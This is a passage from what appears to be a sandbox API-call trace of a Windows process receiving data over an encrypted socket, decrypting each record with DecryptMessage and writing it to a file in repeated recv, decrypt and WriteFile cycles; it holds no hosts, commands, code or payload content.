s=0x5d4, buf=0x379f1b5, len=12320, flags=0 | out: buf=0x379f1b5*) returned 12320 [0087.517] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a36bc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a36bc, pfQOP=0x0) returned 0x0 [0087.517] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x3000, lpOverlapped=0x0) returned 1 [0087.517] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.517] recv (in: s=0x5d4, buf=0x379f1b5, len=4128, flags=0 | out: buf=0x379f1b5*) returned 4128 [0087.518] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a37d0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a37d0, pfQOP=0x0) returned 0x0 [0087.518] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.518] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.518] recv (in: s=0x5d4, buf=0x379f1b5, len=12320, flags=0 | out: buf=0x379f1b5*) returned 12320 [0087.518] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a38e4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a38e4, pfQOP=0x0) returned 0x0 [0087.518] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x3000, lpOverlapped=0x0) returned 1 [0087.518] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.518] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.519] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a39f8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a39f8, pfQOP=0x0) returned 0x0 [0087.522] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.522] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.523] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.523] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a3b0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a3b0c, pfQOP=0x0) returned 0x0 [0087.523] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.523] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.523] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.523] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a3c20, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a3c20, pfQOP=0x0) returned 0x0 [0087.523] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.524] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.524] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.525] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a3d34, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a3d34, pfQOP=0x0) returned 0x0 [0087.525] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.525] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.525] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.525] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a3e48, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a3e48, pfQOP=0x0) returned 0x0 [0087.525] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.526] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.526] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.526] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a3f5c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a3f5c, pfQOP=0x0) returned 0x0 [0087.526] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.526] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.526] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.526] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a4070, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a4070, pfQOP=0x0) returned 0x0 [0087.526] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.527] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.527] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.527] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a4184, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a4184, pfQOP=0x0) returned 0x0 [0087.527] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.528] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.528] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.528] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a4298, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a4298, pfQOP=0x0) returned 0x0 [0087.528] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.537] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.537] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.541] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a43ac, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a43ac, pfQOP=0x0) returned 0x0 [0087.541] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.542] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.542] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.542] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a44c0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a44c0, pfQOP=0x0) returned 0x0 [0087.542] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.542] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.542] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.543] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a45d4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a45d4, pfQOP=0x0) returned 0x0 [0087.543] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.543] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.543] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.544] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a46e8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a46e8, pfQOP=0x0) returned 0x0 [0087.544] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.545] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.545] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.545] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a47fc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a47fc, pfQOP=0x0) returned 0x0 [0087.545] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.545] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.545] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.545] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a4910, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a4910, pfQOP=0x0) returned 0x0 [0087.546] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.547] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.547] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.547] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a4a24, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a4a24, pfQOP=0x0) returned 0x0 [0087.547] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.550] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.550] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.550] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a4b38, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a4b38, pfQOP=0x0) returned 0x0 [0087.550] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.550] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.550] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.550] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a4c4c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a4c4c, pfQOP=0x0) returned 0x0 [0087.551] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.551] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.551] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.551] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a4d60, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a4d60, pfQOP=0x0) returned 0x0 [0087.551] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.552] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.552] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.552] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a4e74, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a4e74, pfQOP=0x0) returned 0x0 [0087.552] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.552] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.552] recv (in: s=0x5d4, buf=0x379f1b5, len=4128, flags=0 | out: buf=0x379f1b5*) returned 4128 [0087.606] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a4f88, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a4f88, pfQOP=0x0) returned 0x0 [0087.606] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.607] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.607] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.607] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a509c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a509c, pfQOP=0x0) returned 0x0 [0087.607] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.607] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.607] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.607] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a51b0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a51b0, pfQOP=0x0) returned 0x0 [0087.608] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.608] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.608] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.608] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a52c4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a52c4, pfQOP=0x0) returned 0x0 [0087.608] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.608] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.609] recv (in: s=0x5d4, buf=0x379f1b5, len=12320, flags=0 | out: buf=0x379f1b5*) returned 12320 [0087.609] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a53d8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a53d8, pfQOP=0x0) returned 0x0 [0087.609] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x3000, lpOverlapped=0x0) returned 1 [0087.609] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.609] recv (in: s=0x5d4, buf=0x379f1b5, len=8224, flags=0 | out: buf=0x379f1b5*) returned 8224 [0087.609] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a54ec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a54ec, pfQOP=0x0) returned 0x0 [0087.609] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x2000, lpOverlapped=0x0) returned 1 [0087.609] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.609] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.610] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a5600, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a5600, pfQOP=0x0) returned 0x0 [0087.610] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.610] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.610] recv (in: s=0x5d4, buf=0x379f1b5, len=8224, flags=0 | out: buf=0x379f1b5*) returned 8224 [0087.610] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a5714, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a5714, pfQOP=0x0) returned 0x0 [0087.610] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x2000, lpOverlapped=0x0) returned 1 [0087.610] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.611] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.611] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a5828, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a5828, pfQOP=0x0) returned 0x0 [0087.611] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.611] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.611] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.611] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a593c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a593c, pfQOP=0x0) returned 0x0 [0087.611] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.612] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.612] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.612] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a5a50, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a5a50, pfQOP=0x0) returned 0x0 [0087.612] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.612] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.612] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.612] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a5b64, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a5b64, pfQOP=0x0) returned 0x0 [0087.613] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.613] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.613] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.613] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a5c78, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a5c78, pfQOP=0x0) returned 0x0 [0087.613] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.614] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.614] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.614] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a5d8c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a5d8c, pfQOP=0x0) returned 0x0 [0087.614] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.615] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.615] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.615] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a5ea0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a5ea0, pfQOP=0x0) returned 0x0 [0087.615] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.615] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.615] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.616] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a5fb4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a5fb4, pfQOP=0x0) returned 0x0 [0087.616] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.616] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.617] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a60c8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a60c8, pfQOP=0x0) returned 0x0 [0087.617] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.617] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a61dc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a61dc, pfQOP=0x0) returned 0x0 [0087.618] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.618] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a62f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a62f0, pfQOP=0x0) returned 0x0 [0087.618] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, 